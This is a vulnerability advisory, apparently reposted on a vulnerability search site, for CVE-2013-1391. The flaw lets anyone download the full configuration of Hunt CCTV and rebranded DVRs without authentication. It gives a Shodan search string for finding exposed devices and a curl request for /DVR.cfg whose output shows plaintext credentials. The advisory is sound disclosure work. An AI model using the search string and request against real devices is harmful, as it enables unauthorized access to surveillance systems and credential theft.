Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2013-1391

Publish Date: 28 Jan 2013

Source

                							

                Hunt CCTV (and generics brands) Insufficient Authentication
January 17, 2013 - A. Ramos &lt;aramosf @ gmail . com&gt;

-- CVE ID:
CVE-2013-1391 [reserved]

-- Affected Vendors:
Hunt CCTV (http://www.huntcctv.com/)
** generic brands from Hunt **
Capture CCTV (http://www.capturecctv.ca/)
NoVus CCTV (http://www.novuscctv.com/)
Well-Vision Inc (http://well-vision.com/)

-- Affected Models:
DVR-04 / DVR-04CH (HuntCCTV)
DVR-04NC (HuntCCTV)
DVR-08 / DVR-08CH (HuntCCTV)
DVR-08NC (HuntCCTV)
DVR-16 / DVR-16CH (HuntCCTV)
CDR 0410VE (CaptureCCTV-HuntCCTV)
CDR 0820VDE (CaptureCCTV-HuntCCTV)
DR6-704A4H (HuntCCTV)
DR6-708A4H (HuntCCTV)
DR6-7316A4H (HuntCCTV)
DR6-7316A4HL (HuntCCTV)
HDR-04KD (unknown-HuntCCTV)
HDR-08KD (unknown-HuntCCTV)
HV-04RD PRO (Hachi-HuntCCTV)
HV-08RD PRO (Hachi-HuntCCTV)
NV-DVR1204 (NovusSec)
NV-DVR1208 (NovusSec)
NV-DVR1216 (NovusSec)
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)

Shodan dork: Basic realm="DVR" server: httpd -mini
Shodan results: 46890
Vulnerable: &gt;70%

-- Vulnerability Details:
You can get the entire backup config with simple GET. No authentication
required.
All information are in clear text: admin panel, ddns config, ppoe
credentials, misc.

Example:

[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i
USER
*   Trying x.x.x.x... connected
 * Connected to x.x.x.x (x.x.x.x) port 80 (#0)
&gt; GET /DVR.cfg HTTP/1.1
&gt; User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2
&gt; Host: x.x.x.x
&gt; Accept: */*
&gt;
&lt; HTTP/1.0 200 Ok
&lt; Server: httpd
&lt; Date: Fri, 17 Jan 2013 05:47:02 GMT
&lt; Cache-Control: no-cache
&lt; Pragma: no-cache
&lt; Expires: 0
&lt; Connection: close
&lt; Content-Type: application/octet-stream
&lt;
USER1_USERNAME=iam
USER1_PASSWORD=sexy

Vulnerable firmware (127 different ones):
  - 1.1.10 to 1.1.92
  - 1.47 to 1.51
  - 2.0.0 to 2.1.93
  - 3.0.04 to 3.1.92

-- Disclosure Timeline:
2011-09-?? - Vulnerability discovered
2012-12-20 - Published in the book "Hacker Epico" (
http://www.hackerepico.com)
2013-01-15 - CVE Assigned
2013-01-20 - Vulnerability reported to vendor
2013-01-24 - Vulnerability reported to GDT (Spain)
2013-01-28 - Public disclosure:
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html

-- 
Alejandro Ramos
www.securitybydefault.com
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Hunt CCTV Credential Disclosure

Vulmon Search

About

Products

Connect